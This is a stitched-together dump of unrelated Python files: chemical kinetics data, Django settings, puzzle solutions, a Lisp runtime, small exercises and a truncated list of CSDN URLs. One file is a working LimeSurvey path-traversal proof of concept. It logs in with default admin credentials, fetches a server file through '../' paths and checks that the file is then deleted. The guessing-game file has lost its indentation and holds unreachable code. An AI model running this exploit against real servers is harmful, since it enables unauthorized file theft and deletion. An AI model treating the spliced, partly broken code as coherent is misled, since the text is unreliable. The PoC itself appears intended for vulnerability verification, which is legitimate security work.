kinetics = Arrhenius(A=(6.51e+07,'cm^3/(mol*s)'), n=1.64, Ea=(11.8407,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 2579 used for Cds-CsCs_Ca;HJ
Exact match found for rate rule [Cds-CsCs_Ca;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['H(3)', 'C=[C]C(C)C(=O)CC(24949)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(0.0366254,'m^3/(mol*s)'), n=1.743, Ea=(71.4418,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsCs_O;YJ] for rate rule [CO-CsCs_O;HJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['H(3)', 'C#CC(C)C([O])CC(24950)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(1.255e+11,'cm^3/(mol*s)'), n=1.005, Ea=(13.1503,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 138 used for Ct-H_Ct-Cs;HJ
Exact match found for rate rule [Ct-H_Ct-Cs;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['CC[CH][O](563)', 'CH3CHCCH2(18175)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(0.00472174,'m^3/(mol*s)'), n=2.41, Ea=(20.1294,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-CsH_Ca;CJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['CH3(17)', 'C=C=CC([O])CC(24951)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(10800,'cm^3/(mol*s)'), n=2.41, Ea=(32.1331,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 597 used for Cds-CsH_Ca;CsJ-HHH
Exact match found for rate rule [Cds-CsH_Ca;CsJ-HHH]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['C2H5CHO(70)', 'C=[C][CH]C(18176)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(0.0201871,'m^3/(mol*s)'), n=2.2105, Ea=(56.0866,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsH_O;YJ] for rate rule [CO-CsH_O;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction8',
reactants = ['C2H5(29)', 'C=[C]C(C)C=O(24541)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(7.94e+10,'cm^3/(mol*s)'), n=0, Ea=(28.0328,'kJ/mol'), T0=(1,'K'), Tmin=(333,'K'), Tmax=(363,'K'), comment="""Estimated using template [CO_O;CsJ-CsHH] for rate rule [CO-CsH_O;CsJ-CsHH]
Euclidian distance = 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction9',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C[C](C)C([O])CC(20837)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(3.677e+10,'s^-1'), n=0.839, Ea=(182.581,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Cd_rad_out_Cd;Cs_H_out_noH] for rate rule [R2H_S;Cd_rad_out_Cd;Cs_H_out_Cs2]
Euclidian distance = 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=[C]C(C)[C](O)CC(24952)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(4.56178e+08,'s^-1'), n=1.25272, Ea=(165.67,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Y_rad_out;Cs_H_out_Cs2] for rate rule [R2H_S;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction11',
reactants = ['[CH]=CC(C)C([O])CC(20846)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(1.08e+06,'s^-1'), n=1.99, Ea=(105.437,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 17 used for R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd
Exact match found for rate rule [R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction12',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=CC(C)[C]([O])CC(20839)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(2.4115e+09,'s^-1'), n=1.00333, Ea=(141.977,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;Cd_rad_out_Cd;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction13',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['[CH2]C(C=C)C([O])CC(20587)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(2.304e+09,'s^-1'), n=1.24, Ea=(151.879,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 204 used for R3H_SS_Cs;Cd_rad_out_Cd;Cs_H_out_2H
Exact match found for rate rule [R3H_SS_Cs;Cd_rad_out_Cd;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=[C][C](C)C(O)CC(24953)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(111914,'s^-1'), n=2.27675, Ea=(75.2806,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;O_rad_out;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction15',
reactants = ['C=[C]C(C)C(O)[CH]C(24954)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(5.71,'s^-1'), n=3.021, Ea=(105.562,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 319 used for R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction16',
reactants = ['[CH2]C([C]=C)C(O)CC(20843)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(8.6e-09,'s^-1'), n=5.55, Ea=(83.68,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 340 used for R4H_SSS;C_rad_out_2H;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_2H;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction17',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=CC(C)C([O])[CH]C(20844)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(74200,'s^-1'), n=2.23, Ea=(44.3086,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H_RSS;Cd_rad_out;Cs_H_out_1H] for rate rule [R4H_SSS;Cd_rad_out_Cd;Cs_H_out_H/NonDeC]
Euclidian distance = 2.44948974278
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction18',
reactants = ['[CH2]CC(O)C(C)[C]=C(24955)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(8.6e-09,'s^-1'), n=5.55, Ea=(83.68,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 340 used for R4H_SSS;C_rad_out_2H;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_2H;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction19',
reactants = ['[CH]=[C]C(C)C(O)CC(24956)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(136000,'s^-1'), n=1.9199, Ea=(33.0402,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5Hall;Cd_rad_out_singleH;XH_out] for rate rule [R5HJ_1;Cd_rad_out_singleH;O_H_out]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction20',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['[CH2]CC([O])C(C)C=C(20848)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(561575,'s^-1'), n=1.6076, Ea=(35.8025,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5H_CCC;Y_rad_out;Cs_H_out_2H] for rate rule [R5H_CCC;Cd_rad_out_Cd;Cs_H_out_2H]
Euclidian distance = 3.0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction21',
reactants = ['CC[CH][O](563)', 'C=[C][CH]C(18176)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(7.46075e+06,'m^3/(mol*s)'), n=0.027223, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -14.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction22',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C=C(C)C(O)CC(24957)'],
transitionState = 'TS22',
kinetics = Arrhenius(A=(2.00399e+09,'s^-1'), n=0.37, Ea=(78.2471,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3;Y_rad;XH_Rrad_De] + [R3radExo;Y_rad;XH_Rrad] for rate rule [R3radExo;Y_rad;XH_Rrad_De]
Euclidian distance = 1.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction23',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=CC(C)C(=O)CC(20852)'],
transitionState = 'TS23',
kinetics = Arrhenius(A=(2.6374e+09,'s^-1'), n=0.37, Ea=(88.9686,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3;Y_rad_De;XH_Rrad] + [R3radExo;Y_rad;XH_Rrad] for rate rule [R3radExo;Y_rad_De;XH_Rrad]
Euclidian distance = 1.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction24',
reactants = ['CH2(S)(23)', 'C=[C]CC([O])CC(24958)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS24',
kinetics = Arrhenius(A=(143764,'m^3/(mol*s)'), n=0.444, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [carbene;R_H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: 1,2_Insertion_carbene
Ea raised from -5.1 to 0 kJ/mol."""),
)
reaction(
label = 'reaction25',
reactants = ['CH2(S)(23)', 'C=[C]C(C)C(C)[O](19568)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS25',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction26',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C([CH]C)C([O])CC(24176)'],
transitionState = 'TS26',
kinetics = Arrhenius(A=(8.66e+11,'s^-1'), n=0.438, Ea=(94.4747,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 5 used for cCs(-HC)CJ;CdsJ;C
Exact match found for rate rule [cCs(-HC)CJ;CdsJ;C]
Euclidian distance = 0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction27',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C(C)[CH]C([O])CC(24959)'],
transitionState = 'TS27',
kinetics = Arrhenius(A=(6.95888e+10,'s^-1'), n=0.7315, Ea=(144.62,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [cCs(-HC)CJ;CJ;CH3] + [cCs(-HC)CJ;CdsJ;C] for rate rule [cCs(-HC)CJ;CdsJ;CH3]
Euclidian distance = 1.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction28',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C1OC(CC)C1C(24923)'],
transitionState = 'TS28',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;Y_rad_out;Ypri_rad_out] for rate rule [R4_SSS;Y_rad_out;Opri_rad]
Euclidian distance = 1.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction29',
reactants = ['H2CC(41)', 'C[CH]C([O])CC(10592)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS29',
kinetics = Arrhenius(A=(1.06732e+06,'m^3/(mol*s)'), n=0.472793, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H/NonDeC;Birad]
Euclidian distance = 3.0
family: Birad_R_Recombination
Ea raised from -3.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction30',
reactants = ['O(4)', 'C=[C]C(C)[CH]CC(24265)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS30',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_rad/H/NonDeC;O_birad]
Euclidian distance = 3.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
network(
label = '4254',
isomers = [
'C=[C]C(C)C([O])CC(20840)',
],
reactants = [
('C2H5CHO(70)', 'CH3CHCCH2(18175)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '4254',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
|
# Settings wrapper for the TODO API, following the django-rest-framework
# APISettings pattern: values are looked up under the 'TODO_API' key of the
# host project's settings, falling back to DEFAULTS below.
from utils.app_setting import APISettings
# Fallback configuration used when the host project defines no override.
DEFAULTS = {
    'TASK_TITLE_MAX_LENGTH': 30,
    # (stored value, human-readable label) pairs for the task status field.
    'TASK_STATUS_CHOICES': [
        (1, 'TODO'),
        (2, 'DOING'),
        (3, 'DONE'),
    ],
    # Dotted paths to DRF permission classes applied to the task endpoints.
    'TASK_PERMISSIONS': [
        'rest_framework.permissions.IsAuthenticated'
    ]
}
api_settings = APISettings('TODO_API', DEFAULTS)
|
"""Google Code Jam 2016 qualification, problem A ("Counting Sheep").

For each starting number N, count through the multiples N, 2N, 3N, ...
until every decimal digit 0-9 has been seen at least once; report the
multiple at which that happens, or INSOMNIA for N = 0 (every multiple
is 0, so the other digits never appear).

Modernized from Python 2 (``xrange``, print statement, eval-style
``input``) to Python 3 with identical input/output behavior.
"""

IMP = "INSOMNIA"


def solve(n):
    """Return the last multiple of ``n`` counted before falling asleep.

    Returns the string INSOMNIA for n == 0. For any n > 0 every digit is
    guaranteed to appear after a small number of multiples, so the 10**4
    iteration cap is only a safety bound and is never reached in practice.
    """
    if not n:
        return IMP
    seen = [0] * 10          # seen[d] == 1 once decimal digit d has appeared
    total = 0
    for _ in range(10 ** 4):
        total += n
        for digit in str(total):
            seen[int(digit)] = 1
        if sum(seen) == 10:
            return total
    return IMP               # unreachable for n > 0; kept as a safeguard


if __name__ == "__main__":
    # Input: number of cases T, then one integer N per case.
    for t in range(int(input())):
        n = int(input())
        # "Case #k: result" — same rendering as the original py2 output.
        print("Case #%d: %s" % (t + 1, solve(n)))
|
import requests
import sys
def login(host):
    """LimeSurvey path-traversal PoC (filemanager getZipFile download).

    Logs into the LimeSurvey admin panel with the credentials below, then
    requests ``filemanager/sa/getZipFile`` twice with a ``../`` traversal
    path pointing at docs/credits.txt. On a vulnerable install the target
    file is served on the first request and removed afterwards, so the
    second request returns an empty body; ``check()`` keys on exactly
    that asymmetry.

    Returns:
        (result1, result2): the response bodies of the first and second
        traversal requests, in that order.
    """
    # --- step 1: authenticate against the admin login form -------------
    burp0_url = "http://"+host+"/index.php/admin/authentication/sa/login"
    # Session id / CSRF token pair captured from a browser session; the
    # form below re-submits the matching YII_CSRF_TOKEN value.
    burp0_cookies = {"PHPSESSID": "d1f05cefe8bec342c61a93cc722b75e1", "YII_CSRF_TOKEN": "Q1h-QUJKZ2x4a09hR3JmdWQ3eVFFNWxHTmtXX0ZqMHZGaRXh68Lir7Dx9LLsALqnWMWyzp6sbmucRtDTeYVf8w%3D%3D"}
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.1.237:8082", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.237:8082/index.php/admin/authentication/sa/login", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    burp0_data = {"YII_CSRF_TOKEN": "Q1h-QUJKZ2x4a09hR3JmdWQ3eVFFNWxHTmtXX0ZqMHZGaRXh68Lir7Dx9LLsALqnWMWyzp6sbmucRtDTeYVf8w==", "authMethod": "Authdb", "user": "admin", "password": "password", "loginlang": "default", "action": "login", "width": "1536", "login_submit": "login"}
    session = requests.session()
    # allow_redirects=False: we only need the Set-Cookie of the 302, not
    # the admin dashboard itself.
    res=session.post(burp0_url, headers=burp0_headers,data=burp0_data,verify=False,cookies=burp0_cookies,allow_redirects=False)
    #print(res.text)
    location=res.headers
    # Carry the authenticated session cookies into the raw requests below.
    phin = requests.utils.dict_from_cookiejar(session.cookies)
    # --- step 2: first traversal download (expected to succeed) --------
    burp0_url = "http://"+host+"/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../var/www/html/docs/credits.txt"
    burp0_cookies = phin
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.237:8082/index.php/admin/authentication/sa/login", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    result1=r.text
    # --- step 3: identical second request; on a vulnerable target the
    # file has been deleted by now and this comes back empty ------------
    burp0_url = "http://"+host+"/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../var/www/html/docs/credits.txt"
    burp0_cookies = phin
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.237:8082/index.php/admin/authentication/sa/login", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    result2=r.text
    #print(r.text)
    #print(r2.status_code)
    return result1,result2
def check(result1, host, result2):
    """Report whether the traversal PoC worked.

    Success criterion: the first download returned content while the
    identical second download came back empty (LimeSurvey removes the
    served file after the first request on vulnerable versions).
    ``host`` is accepted for signature compatibility but unused.

    Returns 0 on success, -1 on failure.
    """
    # Earlier heuristic matched a known string from credits.txt:
    # if("Nino Cosic" in result1 and "Nino Cosic" not in result2):
    succeeded = result1 != '' and result2 == ''
    if succeeded:
        print('PoC success!')
        return 0
    print('PoC failed!')
    return -1
if __name__ == "__main__":
    # Usage: python poc.py <host[:port]>
    host = sys.argv[1]
    #host="web"
    #host="192.168.56.101:8082"
    # login() returns the bodies of the two traversal downloads;
    # check() compares them to decide whether the target is vulnerable.
    result=login(host)
    result1=result[0]
    result2=result[1]
    check(result1,host,result2)
# python-for-android recipe that pins OpenSSL to an exact upstream release.
import os
from pythonforandroid.recipes.openssl import OpenSSLRecipe
from pythonforandroid.util import load_source
# Shared helpers live one directory above this recipe; load them by path
# because the recipes directory is not an importable package.
util = load_source('util', os.path.join(os.path.dirname(os.path.dirname(__file__)), 'util.py'))
# Fail fast if upstream grows dependencies: the pinned subclass below
# assumes the stock recipe pulls in nothing extra.
assert OpenSSLRecipe.depends == []
assert OpenSSLRecipe.python_depends == []
class OpenSSLRecipePinned(util.InheritedRecipeMixin, OpenSSLRecipe):
    # Exact upstream tarball version and the SHA-512 digest it must match.
    url_version = "1.1.1t"
    sha512sum = "628676c9c3bc1cf46083d64f61943079f97f0eefd0264042e40a85dbbd988f271bfe01cd1135d22cc3f67a298f1d078041f8f2e97b0da0d93fe172da573da18c"
# Module-level instance picked up by the p4a recipe loader.
recipe = OpenSSLRecipePinned()
|
import random, time
randomNum = random.randint(1,10)
game = False
menu = False
computerScore = 0
playerScore = 0
game = 1
while game == 1:
Guess = int(input("Guess a number between 1-10: "))
if Guess == randomNum:
time.sleep(1)
exit(print("Congratz, your right :)"))
playerScore = playerScore + 3
elif Guess > randomNum:
time.sleep(1)
print("You guessed to high number.. Try again please.")
computerScore = computerScore + 1
game = 1
elif Guess < randomNum:
time.sleep(1)
print("You guessed to low.. Try again please.")
computerScore = computerScore + 1
game = 1
else:
print("Something went wrong. Check spelling.")
time.sleep(1)
game = 1 |
"""
The runtime functions like an air traffic controller, knitting
together the various language modules to create a context for running
some code
"""
from __future__ import print_function
import os
import sys
import cmd
import traceback
from io import StringIO
from .dialects.norvig.scope import Scope, add_globals
from .dialects.norvig import eval, InPort, parse
from .dialects.norvig import EOF_OBJECT
from .dialects.norvig.parse import to_string
class Repl(cmd.Cmd):
    """Minimal interactive shell that hands every input line to a Runtime."""

    prompt = "lispy> "

    def __init__(self, runtime=None, *args, **kwargs):
        cmd.Cmd.__init__(self, *args, **kwargs)
        self.runtime = runtime

    def default(self, line):
        # Anything cmd.Cmd does not recognize as a command is lisp source:
        # evaluate it and show the result.
        print(self.runtime.eval(line))
class Runtime(object):
    """
    Lispy requires a bit of bootstrapping to get going, setting up
    special forms from multiple dialects, creating a global scope to
    run in, and then calling eval on statements either interactively
    or as a part of a script. This class takes care of the creation of
    a Runtime.
    """
    def __init__(self, special_forms=None):
        """
        Initialize a runtime context.
        special_forms: should be a class that inherits from the dict
        module (or just be a dict)
        """
        # special forms may be passed in, or read from the environment,
        # by default they're the norvig combination of default dialects
        if special_forms is None:
            special_forms = os.environ.get("LISPY_SPECIAL_FORMS_CLASS")
        if special_forms is None:
            # Deferred import keeps module load cheap and avoids cycles.
            from .dialects.norvig.special_forms import SPECIAL_FORMS
            special_forms = SPECIAL_FORMS
        # NOTE(review): when LISPY_SPECIAL_FORMS_CLASS is set, the raw
        # environment *string* is used as-is and never imported — confirm
        # that add_globals accepts a dotted-path string, otherwise that
        # branch looks broken.
        self.special_forms = special_forms
        self.global_env = add_globals(Scope(), special_forms=special_forms)
    # NOTE(review): these keyword defaults are evaluated once at class
    # definition time, so every call shares the same InPort over
    # sys.stdin — fine for one interactive REPL, but worth confirming.
    def repl(
        self,
        prompt='lispy> ',
        inport=InPort(sys.stdin),
        out=sys.stdout,
        err=sys.stderr,
        return_value=False,
        catch_exceptions=True
    ):
        """A prompt-read-eval-print loop.

        Reads complete s-expressions from ``inport`` until EOF_OBJECT.
        When ``return_value`` is true, the value of the first evaluated
        expression is returned instead of printed (used by ``eval``).
        """
        if out is None:
            out = StringIO()
        if err is None:
            err = StringIO()
        while True:
            try:
                if prompt:
                    # Prompt goes to stderr so piped stdout stays clean.
                    sys.stderr.write(prompt)
                x = parse(inport)
                if x is EOF_OBJECT:
                    return
                val = eval(x)
                # NOTE(review): results are written to `err`, not `out`,
                # even though the guard tests `out` — confirm whether the
                # stderr echo is intentional before "fixing" it.
                if val is not None and out and return_value is False:
                    err.write(to_string(val) + "\n")
                    err.flush()
                elif return_value:
                    return val
            except Exception as e:
                if catch_exceptions:
                    # Show the traceback but keep the loop alive.
                    exc_type, exc_value, exc_traceback = sys.exc_info()
                    traceback.print_exception(
                        exc_type,
                        exc_value,
                        exc_traceback
                    )
                else:
                    raise e
    def read_file(self, file):
        """
        grab the individual pieces of code from a file (the complete
        s-expressions) and evaluate them synchronously
        """
        # prompt=None suppresses the interactive banner; out=None makes
        # repl() swallow printed results into a throwaway StringIO.
        self.repl(None, InPort(file), None)
    def eval(self, expression, out=None, err=None):
        """
        Evaluate a string as a lispy program and return its value
        """
        # conditionally unicode the expression for python 3 compatibility
        if sys.version_info[0] < 3:
            expression = unicode(expression)
        return self.repl(
            None,
            InPort(StringIO(expression)),
            out,
            err,
            return_value=True,
            catch_exceptions=False
        )
|
#! /usr/bin/env python
# itgk oeving 2.3c
"""Solve the quadratic equation a*x**2 + b*x + c = 0 from user input.

Modernized from Python 2 print statements; the root printout now uses
%g instead of %d, which silently truncated non-integer roots.
"""
import math


def solve_quadratic(a, b, c):
    """Return the real roots (x, y) with x <= y, or None when there are none.

    Note: a == 0 (a degenerate, linear equation) still raises
    ZeroDivisionError, exactly as the original exercise did.
    """
    discriminant = b ** 2 - 4 * a * c
    if discriminant < 0:
        return None
    root = math.sqrt(discriminant)
    return (-b - root) / (2 * a), (-b + root) / (2 * a)


if __name__ == "__main__":
    a = float(input('skriv inn et tall: '))
    b = float(input('skriv inn et tall til: '))
    c = float(input('og enda et..: '))
    roots = solve_quadratic(a, b, c)
    if roots is None:
        print('likningen har ingen loesning!')
    elif roots[0] == roots[1]:
        # Double root: report it once.
        print('likningen fikk en loesning: %g' % roots[0])
    else:
        print('likningen har 2 gyldige loesninger: %g og %g' % (roots[0], roots[1]))
|
"""Binary Search but recursively
This algorithm is a great example of
divide and conquer strategy. The smaller
pieces of the problem is reassembled to
the whole problem.
The recursion occurs on either half of the
list.
"""
def binary_search_rec(a_list, item, lo=0, hi=None):
    """Recursively binary-search sorted ``a_list`` for ``item``.

    Returns True if ``item`` is present, False otherwise.

    The optional ``lo``/``hi`` bounds (half-open window [lo, hi)) let the
    recursion narrow the search in place. The original sliced the list on
    every call, copying O(n) elements per level and making the whole
    search O(n) instead of O(log n); existing two-argument callers are
    unaffected.
    """
    if hi is None:
        hi = len(a_list)
    if lo >= hi:                       # empty window: item not present
        return False
    midpoint = (lo + hi) // 2
    if a_list[midpoint] == item:
        return True
    elif a_list[midpoint] > item:
        return binary_search_rec(a_list, item, lo, midpoint)
    else:
        return binary_search_rec(a_list, item, midpoint + 1, hi)
# Ad-hoc smoke checks; note test_list[:1-1] is test_list[:0], i.e. [].
test_list = [0, 1, 2, 8, 13, 17, 19, 32, 42]
print(test_list[:1-1])
#print(binary_search_rec(test_list, 3))
#print(binary_search_rec(test_list, 13))
#print(binary_search_rec(test_list, 42))
import requests
import time
url = ['https://blog.csdn.net/qq_37745470/article/details/90413713',
'https://blog.csdn.net/qq_37745470/article/details/90270054',
'https://blog.csdn.net/qq_37745470/article/details/90105930',
'https://blog.csdn.net/qq_37745470/article/details/89817088',
'https://blog.csdn.net/qq_37745470/article/details/89601007',
'https://blog.csdn.net/qq_37745470/article/details/89162749',
'https://blog.csdn.net/qq_37745470/article/details/89158633',
'https://blog.csdn.net/qq_37745470/article/details/89145256',
'https://blog.csdn.net/qq_37745470/article/details/89094227',
'https://blog.csdn.net/qq_37745470/article/details/88804768',
'https://blog.csdn.net/qq_37745470/article/details/88778906',
'https://blog.csdn.net/qq_37745470/article/details/88562301',
'https://blog.csdn.net/qq_37745470/article/details/88542926',
'https://blog.csdn.net/qq_37745470/article/details/88233389',
'https://blog.csdn.net/qq_37745470/article/details/88115117',
'https://blog.csdn.net/qq_37745470/article/details/88089724',
'https://blog.csdn.net/qq_37745470/article/details/88087717',
